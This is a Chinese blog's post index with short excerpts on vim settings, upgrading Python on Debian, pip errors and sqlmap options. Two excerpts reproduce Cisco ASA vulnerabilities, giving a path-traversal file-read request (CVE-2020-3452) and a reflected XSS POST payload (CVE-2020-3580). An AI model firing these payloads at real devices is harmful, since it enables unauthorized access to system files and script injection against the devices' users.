伪静态识别
摘要:
F12--console中输入 alert(document.lastModified) 跟当前时间一样就是动态,因为动态网页总是实时生成的,静态则是当时页面创建的时间 (多次刷新都一样的静态!!!) 阅读全文
posted @ 2022-06-16 11:14 爱在西元间 阅读(36) 评论(0) 推荐(0)
2022年6月16日 #
2022年6月10日 #
vim永久显示行号
摘要:
vi /etc/vim/vimrc 添加set nu 保存即可 (这样可以保留代码高亮设置,不要用新增~/.vimrc的方法,会改掉其他设置) 阅读全文
posted @ 2022-06-10 02:32 爱在西元间 阅读(68) 评论(0) 推荐(0)
Debian9升级最新Python3.10.5
摘要:
wget https://www.python.org/ftp/python/3.10.5/Python-3.10.5.tgz tar zxvf Python-3.10.5.tgz ./configure --enable-optimizations make altinstall 默认安装在了/u 阅读全文
posted @ 2022-06-10 02:09 爱在西元间 阅读(1098) 评论(0) 推荐(0)
ERROR: Package 'rich' requires a different Python: 3.5.3 not in '<4.0,>=3.6'
摘要:
醉了,搞了半天,原来是python3.5不支持rich库了,所以都下不了。。。。 各种换源尝试。。。。 手动下载了,本地安装也不行(最新的) 老版的1.0.1版本的也不行。。。。拉倒了,升python3.6以后吧 阅读全文
posted @ 2022-06-10 01:14 爱在西元间 阅读(101) 评论(0) 推荐(0)
linux系统用pip2安装pip3
摘要:
wget https://bootstrap.pypa.io/pip/3.5/get-pip.py python3 get-pip.py pip2和pip3共存 参考: python2.7安装pip及下载第三方模块_李郭涛的博客-CSDN博客_python2.7 模块下载 https://blog. 阅读全文
posted @ 2022-06-10 00:40 爱在西元间 阅读(93) 评论(0) 推荐(0)
2022年6月9日 #
CISCO ASA设备任意文件读取漏洞(CVE-2020-3452)
摘要:
还是刚才的设备,还有漏洞。。。 payload1是 /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ 1的部分文件内容截图(这个文件名只是当前的网页 阅读全文
posted @ 2022-06-09 22:57 爱在西元间 阅读(756) 评论(0) 推荐(0)
CISCO ASA设备的POST反射型XSS漏洞复现(CVE-2020-3580)
摘要:
今天正好碰到这个系统,找了下存在这个漏洞,记录下 是这个界面的,就打开hackbar,注意url后面部分和post部分 URL部分 /+CSCOE+/saml/sp/acs?tgname=a POST部分 SAMLResponse="><svg/onload=alert('XSSS')> 执行后就会 阅读全文
posted @ 2022-06-09 22:16 爱在西元间 阅读(248) 评论(0) 推荐(0)
2022年6月8日 #
sqlmap指定参数和指定技术扫描
摘要:
-p cid --technique=TECH 指定所使用的技术(B:布尔盲注;E:报错注入;U:联合查询注入;S:文件系统,操作系统,注册表相关注入;T:时间盲注; 默认全部使用) --time-sec=TIMESEC 在基于时间的盲注的时候,指定判断的时间,单位秒,默认5秒。 --delay=D 阅读全文
posted @ 2022-06-08 16:46 爱在西元间 阅读(214) 评论(0) 推荐(0)
2022年6月2日 #
联系ThinkBook笔记本预装windows11家庭中文版系统跳过微软登录验证
摘要:
登录界面按CTRL+Shift+F3(Fn)后重启直接进入administrator,弹窗不要确认 阅读全文
posted @ 2022-06-02 11:17 爱在西元间 阅读(1011) 评论(0) 推荐(0)
浙公网安备 33010602011771号